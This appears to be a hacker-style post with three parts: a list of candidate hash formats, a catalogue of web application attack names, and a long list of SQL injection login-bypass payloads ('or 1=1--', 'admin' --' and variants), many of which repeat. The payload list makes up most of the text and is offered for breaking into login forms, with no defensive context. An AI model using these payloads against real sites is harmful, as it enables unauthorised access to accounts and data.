Hashs

Least Possible Hashs:
[+]  RAdmin v2.x
[+]  NTLM
[+]  MD4
[+]  MD2
[+]  MD5(HMAC)
[+]  MD4(HMAC)
[+]  MD2(HMAC)
[+]  MD5(HMAC(Wordpress))
[+]  Haval-128
[+]  Haval-128(HMAC)
[+]  RipeMD-128
[+]  RipeMD-128(HMAC)
[+]  SNEFRU-128
[+]  SNEFRU-128(HMAC)
[+]  Tiger-128
[+]  Tiger-128(HMAC)
[+]  md5($pass.$salt)
[+]  md5($salt.$pass)
[+]  md5($salt.$pass.$salt)
[+]  md5($salt.$pass.$username)
[+]  md5($salt.md5($pass))
[+]  md5($salt.md5($pass))
[+]  md5($salt.md5($pass.$salt))
[+]  md5($salt.md5($pass.$salt))
[+]  md5($salt.md5($salt.$pass))
[+]  md5($salt.md5(md5($pass).$salt))
[+]  md5($username.0.$pass)
[+]  md5($username.LF.$pass)
[+]  md5($username.md5($pass).$salt)
[+]  md5(md5($pass))
[+]  md5(md5($pass).$salt)
[+]  md5(md5($pass).md5($salt))
[+]  md5(md5($salt).$pass)
[+]  md5(md5($salt).md5($pass))
[+]  md5(md5($username.$pass).$salt)
[+]  md5(md5(md5($pass)))
[+]  md5(md5(md5(md5($pass))))
[+]  md5(md5(md5(md5(md5($pass)))))
[+]  md5(sha1($pass))
[+]  md5(sha1(md5($pass)))
[+]  md5(sha1(md5(sha1($pass))))
[+]  md5(strtoupper(md5($pass))

Website attack methods

Here is the list of Type of attack on webs base application...

[~]Sql Injection Attack
[~]Hibernate Query Language Injection
[~]Direct OS Code Injection
[~]XML Entity Injection
[~]Broken Authentication and Session Management
[~]Cross-Site Scripting (XSS)
[~]Insecure Direct Object References
[~]Security Misconfiguration
[~]Sensitive Data Exposure
[~]Missing Function Level Access Control
[~]Cross-Site Request Forgery (CSRF)
[~]Using Components with Known Vulnerabilities
[~]Unvalidated Redirects and Forwards
[~]Cross Site Scripting Attacks
[~]ClickjackingAttacks
[~]DNS Cache Poisoning
[~]Symlinking – An Insider Attack
[~]Cross Site Request Forgery Attacks
[~]Remote Code Execution Attacks
[~]Remote File inclusion
[~]Local file inclusion
[~]Evercookie
[~]Denial of Service Attack
[~]Cookie Eviction
[~]phpwn
[~]NAT Pinning
[~]XSHM
[~]MitM DNS Rebinding SSL/TLS Wildcards and XSS
[~]Quick Proxy Detection
[~]Improving HTTPS Side Channel Attacks
[~]Side Channel Attacks in SSL
[~]Turning XSS into Clickjacking
[~]Bypassing CSRF protections with ClickJacking and
[~]HTTP Parameter Pollution
[~]URL Hijacking
[~]Strokejacking
[~]Fooling B64_Encode(Payload) on WAFs and filters
[~]MySQL Stacked Queries with SQL Injection.
[~]Posting raw XML cross-domain
[~]Generic cross-browser cross-domain theft
[~]Attacking HTTPS with Cache Injection
[~]Tapjacking
[~]XSS-Track
[~]Next Generation Clickjacking
[~]XSSing client-side dynamic HTML.
[~]Stroke triggered XSS and StrokeJacking
[~]Lost in Translation
[~]Persistent Cross Interface Attacks
[~]Chronofeit Phishing
[~]SQLi filter evasion cheat sheet (MySQL)
[~]Tabnabbing
[~]UI Redressing
[~]Cookie Poisoning
[~]SSRF
[~]Bruteforce of PHPSESSID
[~]Blended Threats and JavaScript
[~]Cross-Site Port Attacks
[~]CAPTCHA Re-Riding Attack

Source: Blogs & FB Pages

Note: Add more if I miss anyone 😊

Login bypass using sqli dork

x' or 'x'='x
' or 0=0 --
" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'